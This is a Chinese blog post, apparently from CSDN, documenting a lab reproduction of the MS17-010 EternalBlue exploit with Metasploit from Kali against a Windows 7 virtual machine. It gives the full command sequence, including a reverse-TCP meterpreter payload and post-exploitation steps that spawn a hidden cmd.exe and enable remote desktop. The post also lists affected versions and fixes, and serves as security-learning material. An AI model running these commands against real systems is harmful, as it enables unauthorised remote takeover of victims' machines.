MS17-010永恒之蓝复现

最新推荐文章于 2024-04-12 21:42:14 发布
最新推荐文章于 2024-04-12 21:42:14 发布
阅读量289 收藏 1
点赞数
文章标签: 网络安全 漏洞挖掘
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/QQ17550/article/details/103204582
版权

MS17-010永恒之蓝复现

漏洞危害

恶意代码可以利用445端口,对受害主机进行以下操作

1.远程代码执行。攻击者可利用该漏洞远程控制受害者的电脑。
2.永恒之蓝勒索病毒以及各种变种病毒。

出现的版本

Windows XP SP3

Windows 2003 SP2

Windows Vista

Windows Server 2008

Windows 7 SP1/Windows Server 2008 R2

Windows 8.1

Windows Server 2012

Windows Server 2012 R2

Windows Server 2016

Windows 10

Windows 10 1511

Windows 10 1607

修复方法

1、下载补丁
2、关闭445、135、137、138、139危险端口

实验目的

学习永恒之蓝的全过程,完成对永恒之蓝的复现和利用。

实验工具以及准备

Windows 7 x64 IP:192.168.174.131

kali linux 2019.03版 IP:192.168.174.130

最新版的metasploit

关闭win7的防火墙,打开445端口

实验过程

① 用kali终端输入命令msfconsole打开metasploit
在这里插入图片描述
② 查询msf中的漏洞:search ms17-010
在这里插入图片描述
③ 扫描靶机是否存在漏洞

use auxiliary/scanner/smb/smb_ms17_010(使用扫描模块)

show options(查看选项)
在这里插入图片描述
set rhosts 192.168.174.131 (设置靶机的IP)
exploit(利用)
在这里插入图片描述
扫描结束提示主机可能存在漏洞,接下来就可以利用了

④ 攻击模块并配置参数

use exploit/windows/smb/ms17_010_eternalblue(加载攻击模块)

set payload windows/x64/meterpreter/reverse_tcp(设置payload)

show options(查看选项)
在这里插入图片描述
set rhost 192.168.174.131 (设置靶机的IP)

set lhost 192.168.174.130 (设置发起攻击的主机IP)

set lport 443 (反弹shell)

启动
在这里插入图片描述
完成对永恒之蓝的利用,如果还需要执行其他操作的话,就是后渗透
在这里插入图片描述

后渗透

查看网络配置ipconfig
在这里插入图片描述
执行系统命令execute -H -i -f cmd.exe
在这里插入图片描述
开启3389远程连接:run getgui -e
在这里插入图片描述
进行远程连接
在这里插入图片描述
rdesktop -u 账号 -p 密码 meterpreter 192.168.174.131:3389

gui -e
[外链图片转存中...(img-yVPCmXfV-1574414804000)]

进行远程连接

rdesktop -u 账号 -p 密码 meterpreter 192.168.174.131:3389

在这里插入图片描述

QQ17550
关注
Ms17-010永恒之蓝漏洞复现
千寻的博客
01-04 1543
Ms17-010永恒之蓝漏洞复现 0x00 漏洞介绍 永恒之蓝是指2017年4月14日晚, “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限 2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,在多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 0x01漏洞原理 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对S...
MS17-010永恒之蓝漏洞原理及复现(学习中,未完善)
chenbx163的博客
08-02 230
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。设置被攻击IP地址后,并执行,然后找到蓝屏命令use0(其他电脑不一定,根据英文选择)并使用。一、什么是永恒之蓝
永恒之蓝复现
xdjxi的博客
03-07 359
一、基础知识介绍: 1.何为永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 2.什么是SMB协议? SM...
永恒之蓝(CVE-2017-0146)复现(超详细)
轻舟已过万重山
09-21 6119
大家好,这是我来到CSDN创作的第二篇博客,我在进行实战模拟时跟大家一样,找到的教程,资料都是参差不齐,要么文章含金量不高,要么不详细,跳过了很多步骤,导致我们在实战复现的过程中,遭遇了各种各样的阻碍,但是我们在搜索相关报错信息时又找不到资料,整个安全圈的技术属于只对圈内开放,难住了很多想要入门的小伙伴,所以在此之后,我会将我自己的学习路线和每次实战的思路,以及遇到的问题,都写成博客,希望能够帮到大家,也希望有大神来指导指导我,大家一起共同进步。
复现永恒之蓝
qq_45956062的博客
12-07 1351
SMB(Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源;永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。首先我们关闭win7的防火墙,不关闭防火墙后续操作可能存在问题(有可能nmap扫描不到其端口,MSF利用不了永恒之蓝漏洞)(1)用kali中的nmap 扫描网段做主机发现。
MS17-010永恒之蓝复现与利用
kriesa的博客
07-13 782
MS17-010永恒之蓝复现与利用
ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
weixin_48710435的博客
08-05 2680
一、实验环境: 1、攻击机:KaliIP:192.168.218.157 1)攻击工具:msf 2)分析工具:wireshark 2、靶 机:Windows7(旗舰版) IP:192.168.218.160 1)开启网络共享(SMB协议) 2)关闭防火墙 3、网卡连接方式:Vmnet8(NAT) 二、实验步骤: 1、测试攻击机与靶机的连通性 2.进行MS17-010漏洞扫描 1)启动msf 命令:msfconsole ...
永恒之蓝ms17-010复现
最新发布
weixin_74020633的博客
04-12 1100
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;利用辅助模块进行扫描,该模块不会直接在攻击机和靶机之间建立访问,只负责执行扫描,嗅探,指纹识别的相关功能,以辅助渗透测试。
MS17-010永恒之蓝复现
m0_52701599的博客
01-11 456
永恒之蓝漏洞复现
永恒之蓝复现与利用
m0_66890717的博客
04-14 1560
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。2、漏洞原理:永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。
永恒之蓝复现(个人申明,此为个人学习的笔记,可能摘录自他人的文章,而非原创)
2301_76881678的博客
03-21 1868
永恒之蓝漏洞的复现(单人版)
MS17_010 永恒之蓝复现
热门推荐
信安是不可或缺的一部分!
07-27 4万+
https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010Metasploit介绍及命令:https://blog.csdn.net/qq_39583774/article/details/119144119 主机探测 查找模块ms17-010 使用方法: 先决条件:windos7有摄像头,并能够使用。这里使用虚拟机连接真实机摄像头 这里拍了一张照片,我拿手挡住了,建议大家还是把笔记本电脑的摄像
永恒之蓝复现(ms17_010)
hclimg的博客
08-06 258
永恒之蓝:利用Windows系统的SMB漏洞可以获取系统最高权限 攻击机:kali 测试机:windows7 旗舰版 ip 192.168.232.151 1.打开msf,搜索ms17_010 2.进入smb_ms17_010扫描模块,设置攻击机的ip,这一步主要是检测该地址是否可以使用永恒之蓝漏洞,发现可以 3.进入ms17_010_eternalblue攻击模块,设置ip地址,直接进行e...
ms17-010永恒之蓝) 漏洞复现与处理
06-06
对于 ms17-010永恒之蓝)漏洞的复现和处理,需要进行以下几个步骤: 1. 确认系统是否存在漏洞:检查系统是否存在 SMB 服务,如果存在并且版本为 Windows 7、Windows Server 2008 R2 或更高版本,则可能存在该漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值